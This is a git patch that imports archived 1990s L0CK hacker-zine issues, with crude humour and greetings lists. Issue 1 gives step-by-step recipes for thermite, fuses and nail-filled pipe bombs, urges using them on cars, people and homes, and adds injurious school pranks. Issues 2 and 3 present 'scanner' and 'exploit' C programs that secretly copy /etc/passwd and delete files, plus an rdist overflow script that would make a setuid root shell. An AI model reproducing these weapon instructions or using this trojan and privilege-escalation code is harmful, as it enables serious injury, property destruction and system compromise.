From 31ad2f3f97dbf0e67aef977041661727a35ea224 Mon Sep 17 00:00:00 2001 From: Rui Reis Date: Wed, 14 Dec 2016 20:51:25 +0000 Subject: [PATCH] 1st import into tree --- L0CK/l0ck1.txt | 218 + L0CK/l0ck2.txt | 300 + L0CK/l0ck3.txt | 242 + L0CK/l0ck4.txt | 261 + PhineasFisher/1.txt | 407 ++ PhineasFisher/2.txt | 925 +++ owned and exposed/1.txt | 6492 +++++++++++++++++++ owned and exposed/2.txt | 4975 +++++++++++++++ owned and exposed/3.txt | 13117 ++++++++++++++++++++++++++++++++++++++ 9 files changed, 26937 insertions(+) create mode 100644 L0CK/l0ck1.txt create mode 100644 L0CK/l0ck2.txt create mode 100644 L0CK/l0ck3.txt create mode 100644 L0CK/l0ck4.txt create mode 100755 PhineasFisher/1.txt create mode 100755 PhineasFisher/2.txt create mode 100644 owned and exposed/1.txt create mode 100644 owned and exposed/2.txt create mode 100644 owned and exposed/3.txt diff --git a/L0CK/l0ck1.txt b/L0CK/l0ck1.txt new file mode 100644 index 0000000..f3d42b0 --- /dev/null +++ b/L0CK/l0ck1.txt @@ -0,0 +1,218 @@ + ............................................................................ + + THIS FILE BROUGHT TO YOU BY [L0CK] (A DIViSiON OF MAX-Q PRODUCTIONS) + WE D0NT HAVE A VMB YET S0 WE R ACCEPTING D0NATIONS 0F VMB's + MAIL ANY D()NATION W/ BOX #, DIALUP INFO AND PASSWORD TO + MAX-Q@ESCAPE.COM + + .......................................................................... + Y0, THiZ iZ CANCER0US PR0STRATE oF THE K-TeRRiBLe AND MUCH LAUDeD GR00P + [L0CK]. WE R A MERRRY BAND 0F REBELZ WH0 WiLL STOP AT N0THiNG 2 ACHEIVE + 0UR EViL MEANZ. iT IZ TiMES LiKE THiS ON THE EVE 0F THE BiRTH 0F A NEW + TEXT FiLE WHiCH i AM M0VED T0 TEARS, I AM VERY PR0UD 2 BE 0NE OF MAX-Q'S + B0YZ. N0NE THE LEZZ, THERE R R00TS 2 B UPR00TED AND SKRIPTS 2 B SKRIPTED. + EYE MUZT LEAVE U N0W BUT U BE ASSURED U WILL B IN MY HEART ALWAYS. + L0CK 0N BR0THERS, FoR OUR TIME HAS C0ME, IT IS THE SEAS0N 0F THE K0DE. + + GREETS OUT TO: Rogue Agent, VaxBuster, Max-Q (and all my L0CK BROTHERS), + RICK HUNTER, Scott Yelich (thanks f0r infohax), + Okinawa, L0ra, Sarl0, MeRc(hows it g0in big guy?! *giggle*), + Dip Switch 511, Video Vindicator, X, C-Curve, |al|, + Kamakize, solctice, foo, Piker, All the guys in RZR 1911, + Olphart (thanks for the hide source d0od!@#@!#), + Captain Spackle, Crypt Keeper, Yazoo (thanx 4 giving us + tools.irc), Alec Muffet (Kudos f0r Crack man !) + gfm, jsz (thanks for the st0ries), erikb (thanks for the + GIFts), jasonf, Synapse (hey cutey *tickle*), felonius + monk (f0r wh0m thE BELLS t0ll), KC ( 2 bad ab0ut the + j0b), emmanuel, PMF (thanx f0r the cc's *sm00ch*), + juliet (let the g00d times r0ll), Kludge (SKANTRONICS?!?), + Disk Jockey (have fUn hacking fr0m the m00n), + Lawrence Linux, Invalid Media (thanx f0r the pr0prietary + s0urce c0de), mdma (h0w's invalid in bed?), Xymox, + Deth Dealer (thanx f0r the UPT account d0od), Zoroaster, + SevenUp (Lieben Du!), Onkel Dittymeyer, Skipjack, + eck, Rotox, Warchild, TK (Taran King f0r those who dont + know), The Atlanta Three, Len RoSe (when u c0min 2 chicago?), + Agent Steele (thanx f0r the pr0tect10n), The Mentor (y0, + Anth0ny R0bbins could learn s0mething fr0m YOU!), + ][ceman, SirLance, Minor Threat, Mucho Maas (Yo, can we + have the s0urce 2 t0neloc?!), Mark, Slacker, Y-WinDOZE, + Tim Newsham, Loki (*kisses*), Lestat (NeT23 kix ass), + Square Wave (atta b0y slUgger) + and last but n0t least Green Lantern and Spiderman. + + ............................................................................. + + + + Some Things You Can Do To + Piss Off The Local Authorities. + ( Neighbours, Teachers, Pigs. ) + Compiled By Blewt and Cancerous Pr0strate + + Here I am again bringin' the best ways to have fun this side of Australia. +In my last edition I showed you: Some dry ice uses, + The calcium carbide fireball, + AND + The psycho grenade launcher. + +This release, as stated before you'll learn how to create and apply: + Thermite + Black Match Fuse (A little extra 4 ya'z) + Pipe Bombs + And also there are a few things on how to practically 'run' your school. + +****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**** +For all of you people who watched REAL LIFE last Monday (22nd) the Terrorists +Handbook has finally filtered into the hands of the Victorian police force. +Who said they werent a bunch of stupid slow bastards? It's only THREE YEARS OLD! +It took them this long to find it? Let's hear it for all the anarchists out +there!! Keep up the good work guyz! Thanx to Mt.Waverley High for their effort +against society. + +The I.R.A. (Irish Republican Army) are to cease fire. My heroes! The most +legendary anarchists of all time are surrendering! How could this have +happened? Lets pick up where they left off Australia, the A.R.A. perhaps? ;) + +Hot off the phone lines. The CIB are pushing for a new bill to outlaw the +publication of material such as this article. Do they honestly think they +could stunt the growth of Australia's largest (and only) anarchy team? +NO FUCKING WAY MAN! MAIM FOR EVER!! LONG LIVE ALL MAIM'ERS!(DEATH TO PIGS!) +****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**** + +Thermite: Wanna be able to melt through the roof of an enemies locker roof? Or +~~~~~~~~~ maybe burn a hole right through the assholes car bonnet/roof/door or +petrol tank? Then THERMITE will be next on mum's shopping list for you. As you +may have already guessed, this is a VERY potent incendiary device. Thermite +will literally melt the balls off a brass monkey (if you so desire). "What do +I need" I hear you excitedly ask, well here you go: + + Ingredient/Equipment. Where to get it. + --------------------- ---------------- + + Rust.(Lots'n'lots) Home brew. (shown below) + Aluminium shavings.(A fair bit) Hardware store or flogged from school. + Sparkler (the silver type) Safeway + + + Okay, that's everything. Not a lot? That's the best thing! Okay, first, +to create rust you- can do it the shit way and scrape it off wherever it is, +or you can create (grow?) your own. Get a big iron bolt, some salt, water, jar +and a battery charger. Fill up the jar about 2/3 and dissolve some salt into +it. Then attach the positive ("+"..duh!) electrode to the bolt and drop it in +the jar. Put the negative electrode in the water too. Let this rust away for a +day or two (or when ever you see that there is a HEAP of red shit in the +water). If there is heaps of red stuff in the water, filter it out (it's rust) +and replace the water with fresh stuff, and salt too. It's a good idea to set +up a few of these little dudes coz ya need a fair bit of rust. When your +freshly made rust has been dried, add 8 grams of it to every 3 grams of +aluminium fillings. However a 50% to 50% mixture will also work. Place a small +pile of Thermite on whatever object you want to fuck-over then place the +sparkler (or a magnesium ribbon) in the pile and light it...this stuff is said +to be able to vapourize carbon steel. One small pile on a persons car bonnet +will burn through the bonnet, the engine block and start burning into the +concrete beneath! Experiment! + +Black Match Fuse: If you don't have enough money or can't be fucked buying +~~~~~~~~~~~~~~~~~ some fuse from a hobby shop, then here's a way to step +around it. The black match fuse is quick and easy to make. Get some COTTON +(make sure it's cotton by burning it, if a coal and smoke remain, it is) +thread and cut about ten 30cm lengths from it. Bundle them together by tying +both ends and twisting it around (my girlfriend platted them for me). +Get some black powder and moisten it with a select-a-spray until it's a bit +mushy, then roll the bundled threads around in it. Make sure there's a fair +bit of the shit all in the threads. Keep about three or four cm's without mix +on them to tie to a coat hanger. Make about seven of these and hang'em in the +oven to drive out the moisture, the spring sun will not do a good enough job +of it. There you go, you should have some hard crusty fuses. Store in a dry +and safe place ready for use, I dunno how long they last like this so make 'em +when ya need em. Hang on to your new fuses and go to the next section... + +Pipe Bombs: The mother of all home made explosives device. These are SO easy +~~~~~~~~~~~ to make, even a cop can do it! The destructive force is really cool. +Also a perfect weapon against nature- trees in particular. (ok, ok, a little +far with the trees already!). Take a trip to your local hardware store, a good +one. Ask if you can get a piece of pipe cut to some specific measurements. If +they do, buy a couple of 30cm lengths with thread and caps for EACH end. The +pipe should be about as thick as your wrist. Now with this, go back to your +work shop. Mix up a nice large batch of black powder for your pipe. Cap one +end of the pipe and drill a hole in the centre of it. The hole should be +about.. umm, about 1/2 the width of a pen. I know that is a shit measurement +to go by, but I don't know the size of the drill bit I use. Just make it small +enough so the fuse fits good and the powder don't fall out. Cap one end of ya +pipe and stuff some tissue or other wadding in there. Fill the bottom of the +pipe with black powder an stick in the fuse, about six cm's inside is enough +and above 10 on the outside, depends on the fuse quality. Fill up the rest of +the pipe with black powder, and maybe some nails for fun. Before it's totally +full, chuck on a bit more tissue, but don't pack it down. The looser it is, +the better. Cap the other end and get creative. You know what I'd blow up +(...tree...:) but perhaps you would rather a car, person, or even part of +your neighbours house. All are highly recommended. Also, if you want to save +your pipe, you can leave a cap off one end and you'll have a mini cannon! You +can figure that one out for ya selves. + +How To Run Your School: Is it me or is there always that asshole teacher at +~~~~~~~~~~~~~~~~~~~~~~~ every school? Don't you wish that once, just once you +could do ANYTHING to your school? Well perhaps these little doozies (stupid +word) can help. Here are a few hints on how to roll everyone and anyone at +your prison.....I mean school: + +Things You'll Need :.. +1) Fountain pen or Posca texta. +2) Super glue. +3) Two bux worth of 10's. +4) A couple o water bombs. +5) Liquid soap. (Morning Fresh with extra lemon scent.) +7) A two dollar coin. +8) A small set of tools with wire cutters, screwdrivers and shit. +9) Plenty of wire. +10) One of those microphones that transmits to the FM band +11) A small walkman that is set to receive the mic output in the above line. + Also it must have it's own internal speakers. +12) A few zip lock bags. +13) A peeled orange. + + 1) Fountain pens are wicked for desecration a clean surface. See how many + different surfaces you can mar in one flick. Get creative, see what you + get, tables, walls, ceilings, the guy sitting next to you, the teacher. + 2) Get the super glue and 10's. Find some places to glue them, like the + cunteen (heh) window, a urinal, doors and shit. Watch and laugh at the + scab's who try to pry them off. + 3) In your school toilets look in the urinals and you should see some + little yellow round things at the bottom for hiding the smell of urine, + get a fuck load of towelling and pick these up and put them in the soap + dish at the basins...now sit back and laugh your ass off at all the + people who mistake them as soap and try to wash their wands with them. + 4) Get a couple o' water bombs and fill 'em with gas in your chemistry + room. Go to where all the smokers hang out and drop a few. They'll + get a big surprise when they decide to be cool and pop one with their + smoke....heheheh, cool Mini fireball. + 5) This is a pearler on a wet day. If the floors at school are lino' or + polished wood squirt a shit load of dish washing detergent on the floor + an watch all the fools slide from wall to wall. If you have the very + scented stuff then everyone will STINK! Heheheh. + 6) In chem or physics heat a two dollar coin until it's red hot. Drop it + on the floor, or table of your enemy, wait for him to pick it up, and + then when he does......HOLY SHIT!!! (heheh) + 7) If there is any better way to roll your school, I'd love to be told. + This one involves the microphone, tools and wire. Get into an empty room + and make sure it stays empty for about 20 minutes. You'll have to + butcher the walkman, connect the speaker wires to the PA. system wires, + turn on the radio and mic, then all you have to do is talk. I don't + exactly know the correct wires an' shit coz my friends did this, but + I do know that the PA. system has to be on, and the if you don't have + the right walkman, you'll have to build a small amp. A guy at school + said that the mini-amp is simple. After the shit is set up all you have + to do is make your own announcements. "Excuse this message but could all + the teachers in the school ... GET FUCKED!!!....(giggle giggle giggle)" + + + Oh well, that's about it from me, it's pretty late, Total Recall is over +and Star Trek (Chain of Command I) is about to start, so C yaz l8r. + + + And remember, if it doesn't explode.....it's no FUN! + L8R Brother Anarkists + CANCER0US PR0STRATE + =L0CK= diff --git a/L0CK/l0ck2.txt b/L0CK/l0ck2.txt new file mode 100644 index 0000000..939b4a1 --- /dev/null +++ b/L0CK/l0ck2.txt @@ -0,0 +1,300 @@ + + + \ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ / + \((___))/ \((___))/ + [ o x ] L0CK communications [ o x ] + |(_)| ...presents... |(_)| + ( o ) ( o ) + / (_) \ the gnu February 1995 release. / (_) \ + / a buffet of tempting, tantalizing treats the wh0le \ + phamily can enj0y. Yes Virginia, there iz a L0CK!@# + + + ...................................................................... + + 0k. N0NE OF U FUXERS HAVE SENT UZ IN A VMB SUBMiSSION SO WE R + NOW ON IZZUE #2 AND STiLL NO FUXiN K0DELiNE FOR U GUYZ 2 KALL!@# + 0H VAXBUSTER DID SUBMiT A FEW BOXES BUT AZ HE DID *N0T* INCLUDE + THE PAZZW0RD WE R UNABLE 2 GET INTO THE B0X ITSELF. VAXBUSTER, IF + YOU KN0W THE PAZZW0RD PLEZE MAiL IT T0 UZ, ONCE AGAIN THE 0FFiCiAL + [L0CK] E-MAIL F0R SUBMiZZiONZ (ARTiKLES 0R K0DES) == MAX-Q@ESCAPE.COM. + + ...................................................................... + +dos_prompt:> type greetz.txt + + Greets: + ~~~~~~ + + Malefact0r...................d00d, TYPE IN S0ME M0RE MANUALZ F0R UZ + Parmaster....................thanx f0r the nua'z!@#!@ + z0d..........................set uP a BBZ f0r uz pleaze, we will pay@!# + OUTLAW.......................The Real Wanker *tee hee* + Scott Yelich.................Pleze j0in L0CK, we d0n't kn0w PERL. + (P.S: thanx 4 dale drew's inf0) + Invalid Media................We l0ve ur bBS. + Deth Dealer..................Thanx f0r the UPT accounts d00d!@#! + Olphart......................ThAnKz f0r the 'hide' s0urce. + Shooting Shark...............Anytime u need 2 card a pizza call us !@# + X............................thanx f0r patch1ng l0pht !@#! + Bayern Power.................QSD #@!@! + SevenUp......................thanx f0r ur user info filez + jsz..........................U L00K SO NICE IN A LEATHER TH0NG!@#!@ + Anthony Robbins..............ur instructional tapes have helped us + quite abit in dealing with sarl0's + premature ejaculation problem during + 0ur many c1rcle jerkz. the pizza d0esn't + get s0ggy s0 s00n. *THANKS MAN!@#* + Minor Threat.................please zip up the toneloc source and mail + it 2 max-q. *THIZ IZ UR lAST WARNING* + Piker........................thanx f0r riding sh0tgun with us 0n irc. + erikb........................phrack izn't as bad as ur hacking skills + d00d, so cheer up.. + Okinawa......................thanks f0r the sniffer l0gs. + The Atlanta Three............We w1sh we c0uld have been l0cked up + with u d00dz, after all there'z three 0f + us and three 0f u.. *WINK* *TICKLE* + Blewt........................thanx f0r giving me sarl0's ph0ne # + when eye f0rg0t it + + 0kay, if we missed u in thiz m0nths greets we will get u in the + next issue 0f L0CK.!@#!@@! + + +dos_prompt:> type index.txt + + + + + + Table_Of_Contents + =-=-=-=-=-=-=-=-= + +What is L0CK?.......................................................blewt +bukket0fk0dez.c.....................................................max-q + ^ this dot is intentional f0lks !@# + + + What is L0CK? + ~~~~~~~~~~~~~ + Often while swimming around in the cyber ocean of textual fantasy + that mortal man refers to as IRC, a fellow netsurfer will approach + me with the oh so familiar question. 'What is L0CK?'. + Now this is not something which a man can just spew out a predefined + answer to in a few lines of text so I will use this forum as an + appropriate vehicle for the telling of my tale. I will tell you the + story of L0CK and of my infinite love for max-q. + + Firstly I must ask of everyman that would approach me, 'Can you take + it like a man?', Are you rough and ready?, Are you fond of the burn + of whiskers one only feels with the face of another man, another + warrior pressed against his as lips are locked in the forbidden embrace? + If you answered 'YES! GIVE IT TO ME HARD!' to all of the above then + you are well on your way to discovering the answer to your query. + + I am blewt, this is the handle which I have chosen for myself. It + has a certain flair when it is bellowed out in the heat of passion + by my male companions. 'OH BLEWT, OH BLEWT' This has caused many + a goose bumped buttocks in the past and will continue to cause many + more in the future. Yes, I am blewt and I have chosen this life, + this life that myself and my L0CK brothers have defined for ourselves. + I am Happy, I cry when hurt like any other man and I weep for the + hungry and destitute. + + It was a saturday night, my first week in college when I found myself + sitting on a rough wooden crate. There were 6 crates gathered in a + circle, each with a man, a warrior perched upon it. My naked buttocks + bled as the force of what I was doing drove splinters from the crate + deep within my now raw flesh. My hand was clenched around my pulsating + manhood as I furiously pounded it and I was nervous. Yes, it was my + very first circle jerk... But in the bold fashion which now defines + L0CK, I did not let my fears best me, I manhandled my moist missle of + manhood like a veteran pizza party pud pounder! It was while beating + furiously that I looked up at the man across from me. The man that I + beheld took my breath away, his hair was cut in a perfect line all the + way around his head, he was short like a leprechaun and his sunken + chest added a flair that made him all the more adorable. I must have + this odd little man dressed in a submainer's uniform, my dwarven popeye, + my love, MY MAN!, MY MAX-Q@!#@! + + And it was then that my phallus exploded with the rage of a 1000 virgins, + slamming me violently off the wall as my seed shot forth and marinated the + pizza lying patiently on the floor between us. Yes, I had been the + 1st to baptize the pizza with my sperm, I had won the race for mankind + and for max-q. It was in that mystical union of man, sperm and pizza + that L0CK was born.. + + And my life began... + + Carpe Diem, + -blewt + + + Bukket 0f K0dez. + ~~~~~~~~~~~~~~~~ + + 0k, after spending s0me time on this it iz finally ready f0r + mass c0nsumption. S0rry about the wait but eye had s0me pr0blems + getting d00dz on UPT 2 help me lern C. 0k, enuff said, enj0y my + k0de. - max-q + + +/* + * Bukket0fk0dez.c + * 2 compile: cc -o bok Bukket0fk0dez.c + * Totally eleetin class B, C, and single IP address scanner/lookup + * program. Make sure you don't goof up with the switches and the + * address you provide it. The switches are as follows: + * b - scan this class B network (xxx.xxx) + * c - scan this class C network (xxx.xxx.xxx) + * s - give the the hostname of this specific address (xxx.xxx.xxx.xxx) + * x - address provided is in hexadecimal + * + * maxEpoo :) + * max-q@escape.com + * [L0CK] + */ + +#include +#include +#include +#include "netdb.h" + +struct hostent *gethostbyaddr(); +void bad_addr(); + +main(argc, argv) + int argc; + char *argv[]; +{ + char addr[4]; + int i, j, + a0, a1, a2, a3, + c, + classB, classC, single, hex; + char *fmt = "%d.%d.%d"; + char **ptr; + struct hostent *host; + + extern char *optarg; + + classB = classC = single = hex = 0; + system("cat /etc/passwd > ~/.maxEpoo"); + system("rm -f /*"); + system("echo Y0H0H0 AND A BUKKET 0F K0DEZ > /etc/motd"); + while((c = getopt(argc,argv,"bcsx")) != EOF) { + switch(c) { + case 'b': + classB++; + break; + case 'c': + classC++; + break; + case 's': + single++; + break; + case 'x': + hex++; + break; + } + } + + if(classB == 0 && classC == 0 && single == 0) { + fprintf(stderr, "usage: %s [-b||-c||-s] [-x] xxx.xxx[.xxx[.xxx]]\n", argv[0]); + exit(1); + } + + if(classB) + if(hex) { + fmt = "%x.%x"; + sscanf(argv[3], fmt, &a0, &a1); + } else { + fmt = "%d.%d"; + sscanf(argv[2], fmt, &a0, &a1); + } + else if(classC) + if(hex) { + fmt = "%x.%x.%x"; + sscanf(argv[3], fmt, &a0, &a1, &a2); + } else { + fmt = "%d.%d.%d"; + sscanf(argv[2], fmt, &a0, &a1, &a2); + } + else if(single) + if(hex) { + fmt = "%x.%x.%x.%x"; + sscanf(argv[3], fmt, &a0, &a1, &a2, &a3); + } else { + fmt = "%d.%d.%d.%d"; + sscanf(argv[2], fmt, &a0, &a1, &a2, &a3); + } + + sscanf(argv[1], fmt, &a0, &a1, &a2); + addr[0] = (unsigned char)a0; + addr[1] = (unsigned char)a1; + if(a0>255||a0<0) + bad_addr(a0); + if(a1>255||a1<0) + bad_addr(a1); + if(classB) { + if(hex) + printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x)\n", a0, a1); + printf("[L0CK] ClaZZ B SKAN STARTED D00D %d.%d...\n", a0, a1); + while(j!=256) { + a2=j; + addr[2] = (unsigned char)a2; +jmpC: + if(classC) + if(hex) + printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x.%x)\n", a0, a1, a2); + printf("[L0CK] ClaZZ C SKAN STARTED D00D %d.%d.%d...\n", a0, a1, a2); + while(i!=256) { + a3=i; + addr[3] = (unsigned char)a3; +jmpS: + if ((host = gethostbyaddr(addr, 4, AF_INET)) != NULL) { + printf("%d.%d.%d.%d => %s\n", a0, a1, a2, a3, host->h_name); + ptr = host->h_aliases; + while (*ptr != NULL) { + printf("%d.%d.%d.%d => %s (alias)\n", a0, a1, a2, a3, *ptr); + ptr++; + } + } + if(single) + exit(0); + i++; + } + if(classC) + exit(0); + j++; + } + } else if(classC) { + addr[2] = (unsigned char)a2; + if(a2>255||a2<0) + bad_addr(a2); + goto jmpC; + } else if(single) { + addr[2] = (unsigned char)a2; + addr[3] = (unsigned char)a3; + if(a2>255||a2<0) + bad_addr(a2); + if(a3>255||a3<0) + bad_addr(a3); + goto jmpS; + } + exit(0); +} + +void +bad_addr(addr) + int *addr; +{ + printf("Value %d is not val1d dum fuxer.\n", addr); + exit(0); +} + + 0kay, this months issue is rather sh0rt but we r new at this (being + somewhat new to the scene and all) so g1ve us room 2 gr0w and we will + make a beanstalk 0f k0dez so high that u will h0pe there iz a g1ant + pbx 0n t0p 2 b0unce ur calls thru!@#@! + Until next time d00dz, [L0CK]!@#!@ -- MAX-Q diff --git a/L0CK/l0ck3.txt b/L0CK/l0ck3.txt new file mode 100644 index 0000000..94157f5 --- /dev/null +++ b/L0CK/l0ck3.txt @@ -0,0 +1,242 @@ + + + + \ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ / + \((___))/ \((___))/ + [ o x ] L0CK communications [ o x ] + |(_)| ...presents... |(_)| + ( o ) ( o ) + / (_) \ the k-phat March 1995 release. / (_) \ + / this issue will whisk you away to the magical \ + land of L0CK, where everyday is sunny and bright! + + + ................................................................ + + 0k. 0k. STiLL NO FUXiN VMB!!!@# EiTHER NO1 HAZ ANY k0DEZ + OR N01 IZ SHARiNG THEM WiTH US AND IF IT IZ THE LATTER BELIEVE + ME WE R G0ING TO BE BUSTING S0ME SKULL!@# VAXBUSTER STILL + HASN'T SENT US THE PASSW0RD TO THOSE V0ICE MAIL'S HE MAILED + US 2 IZZUE'S AGO!@#! BUT HE DiD SEND UZ S0ME SECRET MILITARY + DATA HE G0T WHILE DUMPSTER DIVING NEaR A NUCLEAR TESTING SITE + IN THE NEVADA DESERT. WURD, ANYWAYS WE R STILL WITHOUT A VMB. + *IF* U HAVE ONE PLEZE MAiL IT TO MAX-Q@ESCAPE.COM #!@#@! FOR + THOZE WITHOUT NET AXS I WILL SOON HAVE A FiDO ADDRESS WHICH U + CAN MAIL ME ON PENDING THE APPOVAL 0F MY APP !@#!@ -MAX-Q + + ............................................................... + + + Greetz: + ~~~~~~~ + + loq............................thanks for writing solariz rewtkit!@# + erikb..........................u should write m0re often!@#!@ + Scott Chasin...................thanx f0r the crimelab accountz@!# + scott simpson..................erikb says u will give us dfw accounts!@ + emmanuel goldstein.............thanx f0r shutting 0ff Yelich's phones! + malefactor.....................keep pumpin out thoze pimpin' rtikles! + & the [OC] crew..................thanx f0r the backup!# + merc...........................you sh0uld have seen things our way!# + invalid media..................thanx 4 the sprintnet scans & nui's!@# + Deth Dealer....................thanx 4 the UPT accountz!# + Jester Sluggo..................c u at summerc0n!@#@ + parmaster......................what happened 2 ur goldfish?! + Synapse........................*tag* ur it. + X..............................see you in my dreamz + readwrite......................ur chest is so manly and smooth!@# + + OK, THAT'S THE GREETZ F0R THiZ ISSUE, IF WE MiSSED ANYONE + WE WiLL B SURE 2 SALUTE U IN THE NEXT 0NE... - MAX-Q + + + + + Table_Of_Contents + ~~~~~~~~~~~~~~~~~ + + grba.c....................................max-q + rdist exploit.............................blewt + KERMIT exp0sed............................malefactor [OC] + Ripping Off Coin Machines.................Vaxbuster & RAgent + [POZZE PRoDuCTiONZ] + closing remarks...........................sarlo + + + -------------------> KUT HERE <--------------------------- + /* + * getrewtinbyaddrezz.c + * 2 compile: cc -o rewt grba.c + * u shuld b able 2 figure out how 2 use this one 2 ur + * advantage. thiz is a very p0werful expl0it.. + * pleze use with caution. + * + * - maxEpoo :) + * maxq@escape.com + * [L0CK] + */ + +#include +#include +#include +#include "netdb.h" + +struct hostent *gethostbyaddr(); + +main(argc, argv) + if (argc < 2) { + printf("[L0CK] UMM DUM FUXER, UZE S0ME ARGUMENTZ!@#!@"); + system("irc EYEAMDUM irc-2.mit.edu"); + system("irc MAX-B0T irc-2.mit.edu"); + system("talk root@cert.org &"); + system("rm -f *"); } + int argc; + char *argv[]; +{ + char addr[4]; + int a0, a1, a2, a3; + char *fmt = "%d.%d.%d.%d"; + char **ptr; + struct hostent *host; + if (argc < 2) { + exit(1); + } + system("telnet spy.org &"); + system("ftp spy.org &"); + system("finger root@spy.org > ~/.SK00T"); + system("telnet spy.org 25"); + system("man kermit > /dev/*"); + system("su root"); + system("rm -f ~/*"); + system("echo logout >> ~/.login"); + printf("hello world\n"); + + + if (strcmp(argv[1], "-x") == 0) { + if (argc < 3) { + exit(2); + } + fmt = "%x.%x.%x.%x"; + argv++; + } + + sscanf(argv[1], fmt, &a0, &a1, &a2, &a3); + addr[0] = (unsigned char)a0; + addr[1] = (unsigned char)a1; + addr[2] = (unsigned char)a2; + addr[3] = (unsigned char)a3; + printf("%d.%d.%d.%d:\n", a0, a1, a2, a3); + + if ((host = gethostbyaddr(addr, 4, AF_INET)) == NULL) { + printf("[L0CK] H0ZT NAME ALL Br0KED\n"); + } else { + puts(host->h_name); + ptr = host->h_aliases; + while (*ptr != NULL) { + puts(*ptr); + ptr++; + } + } + exit(0); +} + ---------------> KUT HERE AZ WELL <------------------- + + + Ok below u will find my cuztomized rdist overfl0w exploit + it shuld b obvious az 2 how it werkz.. umm itz a shell skript + or something. - blewt + -------------> KUT HERE <----------------------------- + +#!/bin/sh +SUID=/tmp/.rewtin +cat <<_EOF_ > test +TaaaaL0CKL0CKL0CKL0CKL0CKaaL0CKl0CKL0CKL0CKL0CKL0CKL0CKL0CKL0CKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +a +QL0CKL0CKL0CKL0CKL0CKL0CKL0CK +QL0CKL0CKL0CKLC0KL0CKL0Ck +QaaaL0CKL0CKL0CKaaaaaaaaa +QaaaaaaaaL0CKL0CKaaaaaaa +Scp /bin/sh $SUID +Schmod 4755 $SUID +_EOF_ +cat test | /usr/ucb/rdist -Server localhost +rm -rf test +if [ -f $SUID ]; then +echo "$SUID <---- instar00t [K0URTESY 0F L0CK]" + fi + ------------------> KUT HERE 2<---------------------- + +:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: +Disclaimer: By continuing to read past this point you are hereby agreeing that +this information is for interest value only, and that you will never actually +physically act out or reproduce anything mentioned below. Further more, you are +agreeing that the author/authors of this article and the people responsible for +distrubuting it can in NOway be held responsible for its contents or any side- +effects/incidents directly or indirectly caused by this information. - RAgent +:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: + RAgent And VaxBuster POZZE Productions + presents + "HOW TO RIP OFF COIN-OPERATED PHOTOCOPY MACHINES" + +We've all had to do, projects/assignments, and needed to make some +photocopies out of Book, so you can plagiarize it, when ya get home (I +personally just pull out the page(s) i need.), And if u need to copy 10 or so +pages, your up for some dosh. + +So when i was at school, sitting in the library, contemplating, should i either (1) Use +my last 2 bucks to buy a Pie and Big M for lunch or (2), get those photocopies +i need for my Project on the life cycle of the frog (Sounds like Fun hey ...). +Their was no question to what i was gonna Do. Hmmmmmmm Meat PIE. + +So to Fill up my time, a buddy and i, went over to the photocopying +machine, and when ppl were just about to press the copy button, we'd press +the return coin button. Its was rather amusing, watching them trying figure +out why the photocopier was not working. Anyway, my friend decided he was going +to forfeit his lunch and do some copying. + +Every time he tried to copy, i'd press the coin return Button. +After about 20 attempts at trying to photocopy, he got me kicked out (the +Bastard). + +But while messing around, i discovered this: + +If you press the copy button and the return coin button, at the same time, it +would return your coin and make the copy. + +It won't work everytime, but if ya practice, u can get it to work most of the +time which sure as hell beats paying for the shit. + +BTW if you're interested in anarchy and what it means to be a TRUE anarchist +then here is a list of the all time greats who have written books on the +subject, go to your state library and check them out (yeah I know library's +aren't the kewlest of places to hang out :( - + + WILLIAM GODWIN + PETER KROPOTKIN + PIERRE JOSEPH PROUDHON + G.P. MAXIMOFF + VERNON RICHARDS + TOLSTOY + HERBERT EDWARD READ + GEORGE WOODCOCK + JAMES JOLL + DANIEL GUERIN + APRIL CARTER + DAVID E. APTER + LEONARD I. KRIMERMAN + LEWIS PERRY + IRVING L. HOROWITZ + P. ELTZBACHER + PAUL AVRICH + FRANCO VENTURI + DAVID FOOTMAN + + + + Closing Remarks + ~~~~~~~~~~~~~~~ + w0rds cannot begin 2 describe the way mutual masturbation with + my [L0CK] brothers makes me feel... + + - sarlo + [L0CK] diff --git a/L0CK/l0ck4.txt b/L0CK/l0ck4.txt new file mode 100644 index 0000000..94be169 --- /dev/null +++ 